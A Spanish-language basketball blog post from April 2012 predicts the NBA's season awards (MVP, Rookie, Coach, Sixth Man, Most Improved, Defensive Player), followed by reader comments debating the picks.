Pronósticos a los premios 2012

19 de April de 2012 por TheDeerHunter

Llega el momento de empezar a extraer conclusiones de la campaña. No podemos retrasarlo más. Nos llamó angustiado David Stern el otro día para reclamarnos nuestras previsiones a los premios anuales. Es comprensible, porque sin ellas andan perdidos. Don’t worry, David. Aquí las tienes, que para eso estamos. Otro día si eso ya nos invitarás a unas cañejas.

Defensive Player of the Year

En el momento en el que la inmensa mayoría de TJNBA.com apostamos por el 4º galardón consecutivo de Dwight Howard parecía que no iba a haber discusión. Sin embargo, a fecha de hoy, no es así. Las opciones de Serge “Ibloka” Ibaka han crecido mucho, especialmente a partir del All-Star. Partidos de 10 u 11 tapones como si nada, promedios mensuales de 4 y 5… En el arte de destruir el lanzamiento ajeno hoy en día no hay nadie remotamente comparable. No lo es tampoco Howard, que este año ha bajado un punto en ese aspecto concreto. Sin embargo, que nadie se atreva a descartar a Supermán para el premio. Los tapones no son todo en la defensa y, además de seguir siendo un taponador impresionante, Howard cuenta con unas cifras de rebotes y robos de balón insuperables. Ibaka ha progresado mucho y es factible que llegue a dominar el premio los próximos años, pero creemos que Howard aún es la figura defensiva más determinante de la liga, así como una de las más importantes de la historia. Nuestro favorito es él.

Otros nombres importantes que me gustaría destacar especialmente son Tony Allen y Kevin Garnett. Un aplauso para ellos aunque no tienen ninguna opción.

Rookie of the Year

Se quedó algo desangelada la batalla tras la lesión de Ricky Rubio. Quizás no le habría dado para ganar el premio, pero la campaña del chaval había sido preciosa hasta su lesión, recuperando las sensaciones de artista y robando el corazoncito a mucha gente para la causa de los Wolves.

Sin su competencia no hay rival para Kyrie Irving. Total merecimiento. Irving se ha mostrado desde un principio como uno de los mejores bases de la liga. Impacto inmediato, como se suele exigir en estos casos. Madurez y regularidad extraordinarias. Un líder para muchos años y un digno rookie del año. Favorito también en la porra TJNBA, por cierto.

Otros rookies han ido creciendo a lo largo de la temporada, pero no les da para optar al premio. Isaiah Thomas, Klay Thompson, Kenneth Faried o Kawhi Leonard se han hecho con la titularidad en sus equipos. Mención especial para Chandler Parsons, una de las sensaciones del curso que acaba.

Coach of the Year

El premio es uno de los más abiertos que contemplamos. No beneficia a los pronósticos la gran irregularidad de la mayoría de los equipos en una campaña tan específica como ésta.

Parece descartado el favorito de TJNBA al principio de curso, Vinnie del Negro. Las expectativas eran especialmente elevadas en el caso de los Clippers. No se puede decir que hayan hecho un mal trabajo pero tampoco han destacado tanto. Descartaría con la boca pequeña a Tom Thibodeau, por aquello de haberlo ganado el año pasado y que tradicionalmente nadie repite el premio de forma consecutiva. Por méritos podemos atribuirle tantos como al mejor. La imagen colectiva que han transmitido los Bulls, especialmente sin Rose, es su máxima credencial. Nos habría gustado manejar el nombre de Rick Adelman, que hay pocos que lo merezcan más y no lo tengan. También de Doug Collins. Ambos han sido descartados por el flojo final de curso.

Mantienen sus opciones Erik Spoelstra y Scott Brooks, con sus equipos indiscutiblemente bien colocados. Les perjudica la sensación de que sus equipos están precisamente donde se les espera. Frank Vogel también mantiene bien clasificados a sus Pacers desde un punto de partida más humilde. No le dará para ganarlo, con algunos tramos de dudas en la campaña.

Pero los que se nombran con más fuerza son Lionel Hollins, con su grupo de perros de presa en Memphis y su brillante clasificación a pesar de las lesiones; Greg Popovic que, en mi opinión, ganaría de calle el premio si estos magníficos Spurs terminan con el mejor balance de la liga, o, de tapado, el viejo Doc Rivers, que para algunos de nosotros sigue siendo el mejor técnico en activo. Apostaría a que se lo llevará Popovic.

Sixth Man of the Year

Nos descubrimos ante la sabiduría popular en TJNBA porque James Harden fue para la mayoría tan claro candidato al premio cuando se pronosticó la porra como lo es hoy mismo, cuando nadie le tose el premio.

No es tan obvio como puede parecer ahora. Harden no llegó a explotar como se esperaba durante sus dos primeros años. El curso pasado lo terminaba con unos simplemente aceptables 12 puntos, 3 rebotes, 2 asistencias y 1 robo. Hoy Harden, saliendo desde el banco, es el 4º mejor escolta en eficiencia según Hollinger. Ha subido su producción en casi 7 puntos, 1 rebote y 2 asistencias con una significativa mejora en su tiro. Candidato lógico al MIP también. Un jugador que lo tiene todo y una de las claves de que Oklahoma está donde está. También lo será respecto a sus opciones de anillo.

Otros nombres destacados, pero sin ninguna opción real, son los de Mo Williams, Manu Ginóbili, que ha vuelto demasiado tarde, y Louis Williams, bien ayudado por Thaddeus desde el banco de los Sixers. Lamar Odom, sin embargo, entra en el capítulo de decepciones máximas en esta categoría.

Most Improved Player of the Year

Patinazo general. En su día el personal repartía su favoritismo entre DeAndre Jordan y Evan Turner. Evidentemente ni uno ni otro.

Ya hemos presentado un candidato claro, James Harden, pero no es el único. Tantas o mayores opciones las tiene Greg Monroe, quien en su segundo año se ha destapado como el pívot dominante que está llamado a ser. Quizá le perjudica que su temporada rookie ya fue muy buena y la mejora ha sido menos significativa, pero le beneficia que tiene un papel más importante en su equipo que Harden y que el otro ya tiene asignado un premio. En este tipo de asuntos se mira todo.

Otros nombres podrían haber optado a la pelea. Ryan Anderson, Kyle Lowry hasta su lesión o incluso Jeff Teague o Spencer Hawes. Sin embargo, existe otro tapado. Esta temporada será recordada como la de la irrupción de Jeremy Lin. Se trata de una historia tan fascinante y tan sorprendente que por sí sola merece una candidatura al premio.

Most Valuable Player

Descartados Derrick Rose y Dwight Howard, y es que no ha sido el mejor año de ninguno de los dos, individualmente hablando. Con el mal final de su equipo también se han diluido las opciones de Kevin Love, tras un rendimiento sobrehumano. Tampoco Kobe Bryant recuperará este cetro, a pesar de hacerlo con el de máximo artillero. Mucha gente ha asociado su figura a varios males de los Lakers.

La lucha va a estar entre LeBron James y Kevin Durant, nuestros dos favoritos en la porra TJNBA. Diría que ambos lo merecen. La campaña de LeBron es una animalada (otra más) y se le ha llegado a comparar en algún momento con las mejores individualmente de la historia. Sus hándicaps pueden ser que ya lo tiene, sus problemas en el clutch e incluso la discutible opinión de que, estando Wade, es menos importante para los suyos de lo que es Durant. Personalmente diría que no es así y que la campaña de LeBron ha sido más completa, pero Durant ha brillado con más intensidad puntualmente. Creo que lo ganará este último, pero por una diferencia mínima.

Comenta

28 comentarios a esta entrada

  1. Esteban dice:
    #1

    popovich es el entrenador del año, durant el mvp, harden el sexto hombre, irving el rookie, esto sin dudas

    el jugador defensivo y el mayor progreso es masd discutido

    como progreso, quisiera agregar a paul george, que si bien se gano la titular sobre el final de curso y jugo los PO, su año rokkie paso casi entre sombras, y hoy es uno de los mejores defensores de toda la nba, ah mejorado en el apartado ofensivo, y es una de las claves del tercer mejor equipo del este,

    defensivo, tony allen

      Citar

  2. Jose Luis dice:
    #2

    Pues para mí jugador defensivo podía ser Chandler. Es increíble lo que hace este hombre en la defensa a cada equipo que va: Aquellos Hornets con Paul, West y Stojakovic, los Bobcats que entraron a Play-offs, los Mavs el año pasado y ahora los Knicks. Algún reconocimiento merece ya.

    Y otra cosa, aunque va a ser para Irving, no pongáis tanto que la clave ha sido la lesión de Ricky (quizá lo sea porque con él podrían estar en play-offs los wolves). Lo que vengo a decir es que Irving solo ha jugado 8 partidos más que Ricky, que no es mucho vamos.

    Los demás estoy de acuerdo, aunque creo que el MVP debería ser para James. ¿Pekovic para el MIP no lo veis mucho no?

      Citar

  3. simon dice:
    #3

    Para mi:
    -MVP: Durant, la temporada de Lebron me parece mas completa pero el hecho de que Durant nos haya regalado varios buzzer beater y algunos partidos estelares hacen que me decante por Durantula. Si Love hubiera metido a sus Wolves en PO quizás… pero como no ha sucedido…
    -Sexto Hombre: Harden and no more.
    -Entrenador: Aunque ya lo ganara el año pasado Tom Tibodeau deberia ganarlo, su equipo sin su estrella en un porrón de partidos ha sido ( va a ser ) el mejor equipo de la liga en la regular, para mí no deberia haber demasiada discusión aqui peor para gustos los colores. Solo quiero decir que se imaginen a Oklahoma sin Durant, Miami sin Lebron, LAL sin Bryant, Dallas sin Nowitzki, o Clippers sin Paul…
    – Rookie: Irving, indiscutiblemente, hay otros rookies que lo han eclipsado en momentos puntuales de la temporada: Rubio, Faried, Leonard, Thomas… ( pero todos han sido un poco irregulares sin embargo el siempre ha mantenido un altisimo nivel y tiene pinta de poder ser un jugador sobre el que recontruir. Para mi no hay mucho debate.
    – Mas mejorado: Aqui hay montones de candidatos y seguro que será el que mas discrepancias haya. En este no sabría decantarme, creo que se lo llevará Lin por todo lo que le rodea. Harden para mi descartado no solo por llevarse el sexto hombre sino porque aunque haya mejorado mucho su rendimiento al final simplemente está siguiendo su escala “normal” igual que Monroe.
    – Defensivo: Me gustaría que se lo llevara Ibaka aunque yo se lo daría a Tony Allen, por su gran energia en defensa y como ha contagiado a Memphis desde que llegó. la temporada de Howard es normalita y por todo lo que rodea a su equipo y a su figura mas vale que le dieran el premio a “payaso del año”. No obstante se lo llevará Howard como siempre.

      Citar

  4. TheDeerHunter dice:
    #4

    @Jose Luis: Ricky ha sido el único que le ha plantado cara en esa carrera. Durante algunas semanas en los rankings americanos lo ponían por delante. Luego sí pasó algún tramo de irregularidad que hace que, como ya señalamos, seguramente su campaña no le iba a dar para ganar el premio.

    Por otro lado con Ricky y Love sanos los Wolves iban para postemporada. Ricky de titular y el equipo funcionando como una de las sensaciones de la liga al ritmo que tocaba él. Probablemente tampoco hubiera sido suficiente, porque para este premio los resultados del equipo se tienen menos en cuenta, pero no lo sabremos porque en cuanto se lesionó el premio ya estaba asignado y Irving se ha podido permitir el lujo de tomarse con calma su propia recuperación y todo eso.
    Por cierto, 8 partidos es concretamente la 8ª parte de la temporada.

    Irving ha merecido totalmente el premio, como ya hemos dicho. Pero el hablar de Ricky como hipotética alternativa en algún momento del curso no me lo he inventado.

      Citar

  5. Jose Luis dice:
    #5

    No no, si yo no decía que fuera una hipotética alternativa. Lo que quiero decir es que quizá no debería ser tan tan claro para Irving por el hecho de que Ricky se ha lesionado, ya que Kyrie ha jugado sólo 8 partidos más. Es claro para Irving porque ha sido el más regular y el que mejores estadísticas ha coleccionado, pero para mí, Ricky, a pesar de su lesión, debería tener varias papeletas.

    Por supuesto que en varios tramos de la temporada parecía que Ricky podía ser el rookie del año

      Citar

  6. Nacho dice:
    #6

    -MVP: Durant. O.K. Me parece más decisivo que LeBron, aunque debería mirarme la rabia que le tengo.
    -Sexto Hombre: Harden. Aunque Sessions podría ser también, Lo hemos tenido tres meses en el banquillo, y cuando le hemos dado bola, ha estado bien. No sé que opinará Denise al respecto.
    -Entrenador: Popovich, Thibodeau… A mí me mola más Lionel Hollins. Aunque este premio no es del todo valorable en regular. Soy de los que piensa que Doc Rivers es el mejor entrenador en activo, y se muestra, como los buenos, en su habitat natural, los Playoffs.
    – Rookie: Irving.
    – Mas mejorado: Creo que falta un nombre a analizar, aunque su mayor progresión se ha dado en un solo mes (como Lin, por otra parte) y es Dragic. Un tipo antipático donde los haya cuando viene por Europa, pero ha conseguido mejorar a los Rocketts de Lowry. Para mí, el gran candidato (olvidado, me refiero) Aunque sin ninguna duda, Fisher se podría merecer el premio, ¡qué de noches ha dado a Oklahoma!
    – Defensivo: Creo que en este apartado se valoran más los números, que los fundamentos defensivos, de ahí que el ‘mayor bobo del mundo’ se lo haya llevado cuatro años seguidos. Allen y Chandler serían mis favoritos, son magníficos defensores, y no sólo a título individual, sino por lo que contagian, y eso es importante, muy importante.

      Citar

  7. portu dice:
    #7

    Coincido con Jose Luis, Chandler tiene q verse ya recompensado con el premio al mejor jugador defensivo, q más allá de las estadísticas en rebotes y tapones, el carácter y la fiereza defensiva q impone a todos los equipos donde va es una cualidad q no tienen Ibaka ni Howard. MVP tb votaría por James, más completo en varias facetas del juego y sin Wade muchos partidos. El rookie del año muy descafeinado la verdad, nadie convence, se han visto destellos de muchos pero en periodos cortos.

      Citar

  8. Viva_Dirk dice:
    #8

    Nadie convence salvo Irving ¿no? Ha hecho un temporadón.

      Citar

  9. Esteban dice:
    #9

    es sobrevalorado el trabajo de hollins, a menos que se considera la temporada pasada junto con esta

    este año ha mejorado el equipo y no logro meterse entre los 4 mejores, tuvo muchas lesiones si, pero tiene uno de lños mejores planteles de toda la nba, asi no me parece q haya hecho ese gran trabajo

    si se sumara a lo realizado la temporada pasada si, ahi si tiene mucho mas merito, pero creo que todos esperabamos que menphis estuviera en esa posicion o mejor aun

      Citar

  10. Melo15 dice:
    #10

    Pues yo pondria a Cousins como MIP, ha mejorado en todo, y no solo en apartados tecnicos, se le ve mas centrado.

      Citar

  11. Sancho88 dice:
    #11

    Defensive player: incluyo a Derrick Rose y a Andre Iguodala, al menos para el quinteto defensivo. Pero se lo tiene que llevar Ibaka por su impecable colocación, timing de salto, intimidación, etc. Y además destaca defensivamente por encima del resto porque no necesita hacerle falta al rival para defenderle, su colocación es perfecta, y a eso le añade unos brazos interminables. No veía defender a nadie igual desde Olajuwon y O’Neal

    ROY: Irving, por demostrar una técnica individual impecable, muy buenos fundamentos para romper la zona gracias a su dribbling, y sobre todo un gran tiro exterior, lo que no abunda demasiado en la liga entre los bases (PD: Thomas a mí me ha robado el corazoncito)

    Coach of the year: Thiboddeau, Popovich y Rivers (los tres mejores a mi juicio, por este orden)

    Sexto hombre: James Harden

    Jugador más mejorado: Jeremy Lin sin duda. De ser un cagajo pinchao en un palo a ser una de las sensaciones de la temporada. Se lo tiene que merecer por fuerza. Lideró la última reacción de los Knicks para no perderse definitivamente en el camino hacia playoffs, ganando seis partidos consecutivos gracias exclusivamente a su gran racha, y a partir de ahí todo cambó en la Gran Manzana. Monroe se lo merece, pero no ha logrado marcar la diferencia ni aliarse con Knight para poder haber rozado las 30 victorias, que yo creo que era exigible para los Pistons… no sé, muchos le tachan de demasiado estadista y de no defender con la intensidad debida. Los que dicen eso pueden tener razón…

    MVP: Kevin Durant. Ha demostrado ser más resolutivo que Lebron en los momentos calientes, y da la sensación de estar por encima de cualquier jugador en estos momentos. Yo siempre le taché de ser algo flojeras, pero me tengo que comer mis palabras, porque este tío se atreve a machacarle en la cara a Griffin, Lebron, y a cualquiera. Porque lo está haciendo, de hecho. Brazos inmensos, tiro impecable, aceptable defensa, físico mejorado y entrada a canasta brutal. Es como lo que hace Lebron pero con más velocidad, plasticidad y eficacia. A Lebron le veo algo agarrotado, se mueve más lento que el año pasado. Tiene menos agilidad que Durant

      Citar

  12. Esteban dice:
    #12

    decepcion de la temporada??

    BLAKE GRIFFIN

    yo fui uno de los que a comienzo de curos, ante el ecepticismo de varios en este blog, defendi a blake y lo considere ya una estrella, su temporada de rookie asi lo hacia suponer, siempre dije que sus numeros como rookie solo los habian conseguido unos tal tim dundan y shaq o´neal, crei que ya no debia demostrar mas, que solo podia mejorar y lo haria sin dudas y seria la nueva sensacion de la nba, ni hablar que unido a cp3 era candidado a maximo anotador de la temporada y mvp

    a esta altura podemos decir que ha sido un completo fracaso,

    no mejoro para nada su porcentaje de libres, no mejoro su lanzamiento a 4 o 5 metros, de hecho es casi nulo, no mejoro sus numeros en puntos ni en rebotes, y sigue siendo un pesimo defensor

    sigue siendo un jugador util si, capaz de rebotaer mucho con consistencia y volcar balones en lob, pero poco mas que eso

    no tiene juego al poste, no sabe tirar ganchos, ni usa el umpanunder, no puede lanzar a distancia, ni hablar de triples, no mejoro su defensa en nada, no taponea ni una vez por juego, y es un peligro para su propio equipo en finales cerrados por su porcentaje horrible de libres

    los clippers, ifcharon a cp3 pensando que no habria nada mas prometedor para el base que renovar con los clippers para jugar el resto de carrera con blake, un futuro jugaodr del salon de la fama, el nuevo malone

    hoy mas que el nuevo malone es el nuevo boozer, un buen jugador para anotar en los primeros 3 cuartos y que no hay q ni mirar en los finales de partido, de hecho su promedio de puntos en los uiltimos 3 o 4 minutos de juegos cerrados debe ser de 0

    mas que la razon para convencer a paul que renueve, creo que es la razon por la q paul no renovara, ya que habra que pagarle 20 millones al año y no vale eso, no es el all star que pueda acompañar a paul al titulo

    y para el final una reflexion

    q creen? si en lugar de balke griffin estos mismo clippers tuvieran a kevin love, cual llegaria mas lejos? yo creo que con love este equipo de los clippers es campeon, con griffin segunda ronda

      Citar

  13. simon dice:
    #13

    +1. no se si con Love les llegaría para ser campeón esta misma temporada pero la que viene y posteriores seguro.

      Citar

  14. Jack77 dice:
    #14

    Allen y Chandler, jugadores que transmiten al equipo cosas que otros no pueden transmitir en lo defensivo. Lo que no entiendo del artículo, básicamente, es que señaléis que Ibaka se merece el premio, como segunda opción tras Howard. Vale que ha metido partidos de 10 o 11, y que promedia 5 tapones por partido, pero… ¿DEFENDER es solo meter tapones? Si me das a escoger entre Garnett e Ibaka, solo en lo que aportan defensivamente, las personas en su sano juicio escogerían a Garnett porque Ibaka, y estoy seguro que lo veremos en PO, es un defensor muy mediocre. No se que os hace pensar que Ibaka es un GRAN defensor, en los momentos calientes, se prefiere un Perkins-Collison a un Perkins-Ibaka pero bueno, allá vosotros. En la mayoría de foros, españoles y americanos, los 5 principales candidatos son, y por orden: Howard, Chandler. Garnett, Allen, Ibaka/Deng(estos serian 5º). Con todo esto, mi pregunta es si os creéis toda esa basura que se vende aquí de la Armada Española, ÑBA, y similares chorradas, y solo veis los resúmenes de 3 minutos en NBA.com y miráis cuantos tapones ha hecho en el TV Companion, donde Ibaka tendrá 7 tapones 2 robos, Allen tendrá 1 tapón 1 robo, y diréis que m***** de partido se ha cascado Allen y partidazo de Ibaka. Si fuese por mi, se lo daba a Chandler o a Allen, la razón porque los Knicks han mejorado tanto en defensa y los Grizzlies sean un equipo tan peligroso. Porque Ibaka, es la razón por la que los Thunder son contenders? segundos del oeste?

      Citar

  15. simon dice:
    #15

    Jack creo que debes volver a leerte el articulo, simplemente dice que sus opciones han crecido mucho tras el all-star, señala que los tapones no lo son todo, y es más, comenta que quizá en un futuro pueda ganar el premio pero no ahora.con Howard que tiene secuestrado el premio. Lo señalan como favorito precisamente pq alli y en ese premio se miran mucho los NUMEROS! y los numeros defensivos de Ibaka son brutales, vale que en defensa casi no hay ningun apartado medible, pero en los medibles arrasa.
    Tu acusas de creerse ÑBA y demás “chorradas” estoy de acuerdo en que todo esta sobredimensionado pero tu comentario suena tambien a Hater de todo eso como que Ibaka no es un buen defensor?? Ibaka es un defenso de nivel medio al poste bajo y excelente defendiendo el aro en las demás situaciones. Su sola presencia condiciona el juego del otro equipo y de que manera, el resto de equipos al penetrar se lo piensas dos veces, y eso hace que los exteriores puedan concentrarse mas en defender el tiro a la pentracion. Ya no hablamos de tapones, hablamos de la gran cantidad de penetraciones que vemos que el atacante hace movimientos imposibles con tal de no llevarse el tapón, cosa que a veces consiguen pero tampoco consigeun la canasta que es de lo que se trata al fin y al cabo. A ibaka le falta mucho para ser en defensa lo que puede llegara ser pero joder que ahora parece que es una m…. en defensa según tus palabras.
    Coincido que Garnett es mejor que Ibaka defendiendo pero tampoco mucho, Garnett es un líder en defensa pero tambien sus años de experiencia y su estatus le permiten hacer muchas cosas en defensa y dar muchos palos que a otros no se lo permiten.
    Ibaka no es la razon para que los Thunder sean contenders, es una de las razones, pequeñita pero suma en lo que tiene que sumar. Coincido en que Chandler y Allen causan un impacto mayor en sus equipos que Ibaka y son mas artifices de las mejoras de su equipo pero en serio crees que los Thunder serían tan buen equipo si en vez de Ibaka fuera Collison su 4 titular?
    Por cierto yo he dicho que me gustaría que se lo llevara Ibaka por simpatia, no obstante ya he señalado que yo se lo daría a Allen igual que casi todo el mundo en este foro esta señalando que se lo darian a chandler o allen.
    Para mi: Allen, Chandler, Ibaka, Garnett, Howard para el premio en ese orden además. Aunque este debate es inutil pues se lo llevará Howard

      Citar

  16. Sancho88 dice:
    #16

    Primero, no puedo estar más de acuerdo con cada una de las palabras de Esteban. Gran descripción de lo que está haciendo Griffin esta temporada. Ni un pero a todo lo que has dicho.

    Segundo, en respuesta a Jack, creo que aquí la mayoría de los que escribimos conocemos un poco de qué va este deporte, y no diremos jamás que Ibaka merece el premio o no lo merece solo por las highlights. Sería ridículo. Es como decir que Griffin es el mejor ala-pívot de la liga porque ninguno consigue machacar como él, con esa superioridad. Dicho esto, creo que te estamos dando suficientes argumentos para defender a Ibaka como defensor, valga la redundancia. Serge es un tipo atleta al 100%, con un físico envidiable, unos brazos larguísimos, y aunque le falta altura, la suple con una actitud muy muy buena en defensa. Nunca se arruga en el contacto, se posiciona muy bien con los pies para defender, y si le hemos visto en algún póster esta temporada ha sido precisamente por eso, porque no se esconde. Como dice Simón, condiona el juego de los postes rivales, porque les niega muchas canastas y además no es fácil sacar falta contra él, no necesita intimidar con codazos, empujones y todo eso. Es un tipo muy noble y también la principal baza defensiva de uno de los grandes aspirantes al campeonato y de los mejores equipos de la regular. Si eso no son argumentos para decir que Ibaka se merece el premio… Y por favor, vamos a dejar de utilizar el adjetivo “hace números” para un tipo que juega en el segundo mejor equipo de la Conferencia Oeste en estos momentos, porque esos números que te pueden resultar sobredimensionados, le están ayudando mucho a los Thunder a estar donde están. Creo que no exageramos la actuación de Serge Ibaka para nada, ni nos dejamos guiar por clichés ridículos como ÑBA, como Calderón pierde de 88 puntos pese a su gran actuación (10 puntos 7 asistencias, por poner un ejemplo); y de hecho, de ser así no escribiríamos en este gran foro, sino en el del marca…. Símplemente decimos que nadie tapona como él desde Manute Bol, y que a mí defensivamente se me parece mucho a Olajuwon, por la colocación de su cuerpo, intimidación, y no necesitar de hacer guarradas para anular una acción ofensiva de su rival. Y eso Garnett a veces sí que lo utiliza, el recurso de la provocación, los codos, etc. Si os parece que eso es ser mejor defensa, entonces diremos también que en fútbol defiende mejor Pepe que Puyol.

    De cualquier modo, puede ser que tampoco sea el mejor mejor defensa de la NBA, pero desde luego sí un top.5, y menospreciarle en esa faceta no haría justicia con su juego de ninguna manera

      Citar

  17. Sancho88 dice:
    #17

    hablo de Manute por lo de los promedios de tapones, que se entienda lo que quiero decir

      Citar

  18. Vader dice:
    #18

    Sólo dos apuntes cortos que escribo en el movil;

    – Chandler mi favorito para defensor del año.

    – No seais, aún, muy duros con Griffin. El segundo año siempre es muy difícil y luego un apunte, no ha mejorado sus tiros libres o de media distancia (incluso puede estar peor) pero se nota que si lo esta trabajando. He leido que ha cambiado cosas de su mecanica de tiro para poder mejorar y estos cambios siempre requieren un proceso de aprendizaje.

    Saludos

      Citar

  19. TheDeerHunter dice:
    #19

    @Jack, me parece bastante fuerte que entres aludiendo términos como “basura” y “chorradas” cuando es un hecho que Ibaka está en las quinielas para el premio. Y tiene narices que con todo el tiempo que le dedicamos algunos a esto aparezca el primero que se le ocurra para acusarnos de sólo ver high lights y box-scores.

    Desconozco cuales son tus fuentes, pero creo que estás muy confundido de cómo se perciben las opciones de Ibaka al premio en los distintos medios, americanos, españoles o yemeníes. Apostaría a que en ninguno de ellos, sin excepción a nivel mundial, aparece Allen con más probabilidades. Te apostaría algo gordo a que tampoco estará por encima cuando se hagan públicas las votaciones al premio. Igual no es sólo problema nuestro.

      Citar

  20. GreenPride dice:
    #20

    En cuanto a los premios:
    1) MVP: Para mí Durantula. La temporada de LeBron es una pasada en números pero su equipo está justo donde se le suponía, incluso un punto por debajo ya que parece que quedarán por detrás de los Bulls que han jugado un tercio de los partidos sin Rose. Durantula ha hecho números muy parecidos a LeBron excepto en asistencias y tapones y creo que todos estamos de acuerdo en que ha estado mejor en el clutch. Para mí, este año Durant
    2) Entrenador: Para mí sin duda este año Thiboddeau. Los Bulls pueden conseguir el mejor record de la temporada jugando sin Rose un tercio de los partidos, con eso ya lo deja claro. Si no, Popovich que ha puesto a sus Spurs donde nadie esperaba y sacado de nuevo jugadores que nadie conocía. Rivers no tiene opciones pero para mí en conjunto es el mejor, aunque no merece el título esta temporada.
    3) Sexto Hombre: Harden. No hay duda
    4) MIP: Harden o Monroe. Descarto a Lin porque de toda la temporada sólo ha jugado bien un tercio de ella ya que al principio no contaba y al final ha estado lesionado.
    5) Jugador defensivo: Para mí Ibaka y muy cerca Tony Allen y Garnett. No creo que Howard deba ganarlo este año y sí creo que Ibaka es un gran defensor que condiciona ataques enteros y un más que buen defensor en 1×1. Creo que sí tiene mucha influencia en la defensa de los Thunder, al igual que Allen y Garnett (gran temporada la suya jugando de 5, ha rejuvenecido unos cuantos años)
    6) Rookie: Irving. No hay duda. Creo que aunque Ricky hubiera jugado sin lesionarse tampoco habría duda, aunque Ricky me ha sorprendido muy gratamente este primer año. A ver si se recupera bien y vuelve con fuerza el año que viene

      Citar

  21. Jose Luis dice:
    #21

    La opinión de John Hollinger (para quién no sepa quién es, el encargado del PER en la NBA) sobre Tyson Chandler.

    http://espndeportes.espn.go.com/news/story?id=1502544&s=bas&type=column

      Citar

  22. MagicJohnson32 dice:
    #22

    Oye y ¿por qué no merece el premio Dwight Howard? Vale que ha hecho el payaso y es muy feo lo de Van Gundy, pero vamos, que un equipo como Orlando, con jugadores discretísimos en defensa como Turkoglu, Richardson o Nelson, esté si no me equivoco en el Top 5 de equipos que menos puntos encajan, es esencialmente gracias a la defensa de Howard. Sí, ha bajado en tapones, pero sigue condicionando muchísimos tiros y coge ¡¡¡11 rebotes defensivos de media!!! No sé, creo que con todas las polémicas de estos meses le estamos infravalorando.

    Dicho lo cual, Tyson Chandler, Tony Allen e Ibaka son muy dignos candidatos. Y ya lo he dicho alguna vez por aquí, creo: si Scott Brooks no hiciese lo que hace, los números y la influencia de Ibaka aumentarían bastante. Ibaka es mucho mejor defensor que Perkins y Collison, no hay color, pero Brooks es cabezón o, simplemente, un entrenador de lo más vulgar.

      Citar

  23. Andorra98 dice:
    #23

    Primera vez que entro en el blog y mi mas sincero agradecimiento a los foreros por la calidad de los comentarios. La inmensa mayoria desde el respeto y con bastos conocimientos sobre el tema, no dan la sensacion de hablar desde el fanatismo o su extremo opuesto. Asi que felicidades y ojala que dure, es agradable hablar asi de NBA.

    -El Rookie del año no tiene discusión. Es Irving el que mas ha demostrado en este primer año. Y aunque finalmente ha aparecido mas calidad de estos rookies de la que me esperaba, (personalmente llegue a calificarla como la peor hornada de un draft que yo recuerde con mucha diferencia…hoy dia no pienso lo mismo) el base de los Cavs se ha mostrado un pelín superior. Eso sí, lo que si veo tanto en Irving, como en Rubio y Leonard es potencial….creo que son capaces de crecer muchísimo en sus actuales equipos.

    -Defensivo: es mas complicado…diría Howard-Ibaka-Allen pero no con mucha seguridad… De todas maneras no creo que Ibaka haya sido explotado para que lo veamos con otros ojos. Pienso que realmente es una bestia defensiva con una ventaja sobre Howard, no está continuamente cargado de faltas en los inicios de partido. Lo que si destacaría es como siendo Bynum lo más parecido en fisico a Howard, pierde toda credibilidad defensiva… Siempre creí que con M. Brown mejoraría este apartado muchísimo. Nuevamente me equivoqué…

    -Mas ha mejorado: ….este es que es muy muy dificil coincidir. Me quedaría con Ryan Anderson, sobretodo porque me ha sorprendido, mas que por verdadero merecimiento. No pense que fuera tan tan bueno desde el perimetro…

    -Sexto Hombre: J. Harden…. Nada mas que añadir.

    -Entrenador: Otra muy dificil….Me quedaría con Thibodeau por suplir muy muy bien la ausencia de Rose, como dicen por ahí arriba. Pero personalmente creo que Popovic es el mejor. Saca de donde no tiene y lo administra de manera genial. Nunca pensé que los Spurs estuvieran con estos numeros… Sigo equivocandome.

    -MVP: Es muy discutible, y es más que probable que me deje llevar por mi “pasion”. Pero para mí sería Lebron James. No considero como lei por ahí que se le note “peor” a la vista que el año pasado. Es más, creo que ha mejorado. Ha sobrellevado mucho mejor el peso de los partidos en las ausencias de Wade, tambien ha mejorado su clutch, y su % de tiro me parece impresionante…. De todas maneras, gane o no, en mi opinion LeBron debería habernos sorprendido gratamente a todos…lo tenía todo, estaba entre los 3 mejores de la liga si no el mejor, y aún asi me ha dado la sensación de querer crecer como jugador y de intentar mejorar sus apartados (salvo el tiro libre, su gran laguna en mi opinion…). Durant me parece un dios del baloncesto actual, pero Lebron me parece el rey dios. Algo así como Poseidon y Zeus, jeje.

      Citar

  24. TheDeerHunter dice:
    #24

    Muchas gracias por tu comentario y aportación, Andorra

      Citar

  25. argus dice:
    #25

    Mi primer pensamiento al ver el título de MVP es el siguiente: si Jason Kidd y Grant Hill fueron premiados al ROY en su momento, ¿por qué no hacer lo mismo con Durant y James? Creo que ambos se merecen el MVP y descartar a uno quitando al otro me parece una injusticia, más aún cuando ambos han tenido sus altibajos (Durant en marzo y en partes de este mes, LeBron antes).
    Luego el resto de premios los veo bien. Irving no tiene rival y llevaba unos números a la altura de los grandes rookies (creo que su eficiencia en el lanzamiento no se veía desde Jordan, corregidme si me equivoco o si ha bajado porcentajes, pero estaba con más de 15 puntos con 50% en TC y 40% en T3). En el caso de jugador defensivo creo que Howard no debería estar por actitud, ya que Ibaka o Chandler han sido más trabajadores y vitales en este aspecto. Aunque ya sabemos quién lo ganará, es un secreto a voces.
    En el resto de casos, sin discusión, aunque Love merecería optar de nuevo a ser candidato al MIP. Se habla de que Lin ganaría el premio, aunque creo que Ryan Anderson y Monroe se lo merecen mucho más, especialmente el segundo, que ha ido de menos a más.

      Citar

  26. simon dice:
    #26

    El problema de Monroe Argus esque es jugador de segundo año y para mi el premio a jugadores de segundo año no tiene sentido pues al fin y al cabo solo están siguiendo una progresión sin mas…

      Citar

  27. TheDeerHunter dice:
    #27

    simon:
    El problema de Monroe Argus esque es jugador de segundo año y para mi el premio a jugadores de segundo año no tiene sentido pues al fin y al cabo solo están siguiendo una progresión sin mas…

    Eso es precisamente lo que valora el premio ¿no? la progresión sin más…

      Citar

  28. simon dice:
    #28

    quizá no me expliqué bien en lo que quería decir Deer, quiero decir que un jugador progrese en su segundo respecto a su primer año es lo mas normal del mundo, quiero decir que a mi personalmente el premio se lo daría a jugadores que ya llevan sus 3 o 4 años en la liga y es entonces cuando han dado un salto enorme. o bien a jugadores de segundo año que habiendo hecho una mierda de primer año en el segundo se salen. No es el caso de Monroe que si bien ha crecido bastante no ha sido un cambio espectacular, sino mas bien de su crecimiento natural como jugador y del hecho que está cogiendo mas responsabilidades en un equipucho como es Pistons actualmente.

      Citar

Deja un comentario

